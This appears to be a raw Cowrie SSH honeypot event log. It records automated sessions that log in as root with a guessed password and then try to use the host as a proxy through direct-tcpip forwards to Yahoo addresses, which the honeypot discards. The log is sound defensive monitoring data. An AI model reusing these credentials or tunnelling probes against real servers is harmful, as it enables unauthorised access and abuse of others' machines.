{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:43.749840Z","src_ip":"213.209.150.239","session":"538274d8d0aa"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:44.032550Z","src_ip":"213.209.150.239","session":"538274d8d0aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":21494,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:21494","sensor":"my-vps","timestamp":"2025-08-26T01:03:44.090035Z","session":"538274d8d0aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:44.146856Z","src_ip":"213.209.150.239","session":"538274d8d0aa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":21750,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:21750","sensor":"my-vps","timestamp":"2025-08-26T01:03:44.303167Z","session":"538274d8d0aa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:44.360082Z","src_ip":"213.209.150.239","session":"538274d8d0aa"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:44.417661Z","src_ip":"213.209.150.239","session":"538274d8d0aa"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28304,"dst_ip":"1.2.3.4","dst_port":22,"session":"83bb72029922","protocol":"ssh","message":"New connection: 213.209.150.239:28304 (1.2.3.4:22) [session: 83bb72029922]","sensor":"my-vps","timestamp":"2025-08-26T01:03:44.473004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:44.473657Z","src_ip":"213.209.150.239","session":"83bb72029922"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:44.530154Z","src_ip":"213.209.150.239","session":"83bb72029922"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:44.811605Z","src_ip":"213.209.150.239","session":"83bb72029922"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":10871,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:10871","sensor":"my-vps","timestamp":"2025-08-26T01:03:44.869488Z","session":"83bb72029922"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:44.926028Z","src_ip":"213.209.150.239","session":"83bb72029922"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14572,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14572","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.083033Z","session":"83bb72029922"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.139729Z","src_ip":"213.209.150.239","session":"83bb72029922"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.197247Z","src_ip":"213.209.150.239","session":"83bb72029922"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28358,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbc83f257346","protocol":"ssh","message":"New connection: 213.209.150.239:28358 (1.2.3.4:22) [session: dbc83f257346]","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.243306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.244217Z","src_ip":"213.209.150.239","session":"dbc83f257346"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.291339Z","src_ip":"213.209.150.239","session":"dbc83f257346"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.525887Z","src_ip":"213.209.150.239","session":"dbc83f257346"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":28636,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28636","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.573868Z","session":"dbc83f257346"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.621168Z","src_ip":"213.209.150.239","session":"dbc83f257346"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":32273,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:32273","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.757520Z","session":"dbc83f257346"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.804736Z","src_ip":"213.209.150.239","session":"dbc83f257346"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.852686Z","src_ip":"213.209.150.239","session":"dbc83f257346"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28392,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2e6b8754447","protocol":"ssh","message":"New connection: 213.209.150.239:28392 (1.2.3.4:22) [session: e2e6b8754447]","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.908176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.909482Z","src_ip":"213.209.150.239","session":"e2e6b8754447"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:45.965853Z","src_ip":"213.209.150.239","session":"e2e6b8754447"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":48420,"dst_ip":"1.2.3.4","dst_port":22,"session":"277455d3f003","protocol":"ssh","message":"New connection: 27.112.78.170:48420 (1.2.3.4:22) [session: 277455d3f003]","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.148037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.148959Z","src_ip":"27.112.78.170","session":"277455d3f003"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.247441Z","src_ip":"213.209.150.239","session":"e2e6b8754447"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":1117,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:1117","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.304998Z","session":"e2e6b8754447"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.363095Z","src_ip":"213.209.150.239","session":"e2e6b8754447"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.420273Z","src_ip":"27.112.78.170","session":"277455d3f003"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":9077,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:9077","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.519084Z","session":"e2e6b8754447"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.575624Z","src_ip":"213.209.150.239","session":"e2e6b8754447"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.632757Z","src_ip":"213.209.150.239","session":"e2e6b8754447"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28439,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8c66390080b","protocol":"ssh","message":"New connection: 213.209.150.239:28439 (1.2.3.4:22) [session: c8c66390080b]","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.678898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.679883Z","src_ip":"213.209.150.239","session":"c8c66390080b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.726805Z","src_ip":"213.209.150.239","session":"c8c66390080b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:03:46.961000Z","src_ip":"213.209.150.239","session":"c8c66390080b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":26032,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:26032","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.008816Z","session":"c8c66390080b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.055840Z","src_ip":"213.209.150.239","session":"c8c66390080b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":19372,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19372","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.193392Z","session":"c8c66390080b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.240490Z","src_ip":"213.209.150.239","session":"c8c66390080b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.288510Z","src_ip":"213.209.150.239","session":"c8c66390080b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":28490,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfe2004b4e73","protocol":"ssh","message":"New connection: 213.209.150.239:28490 (1.2.3.4:22) [session: bfe2004b4e73]","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.344141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:03:47.345437Z","src_ip":"213.209.150.239","session":"bfe2004b4e73"}
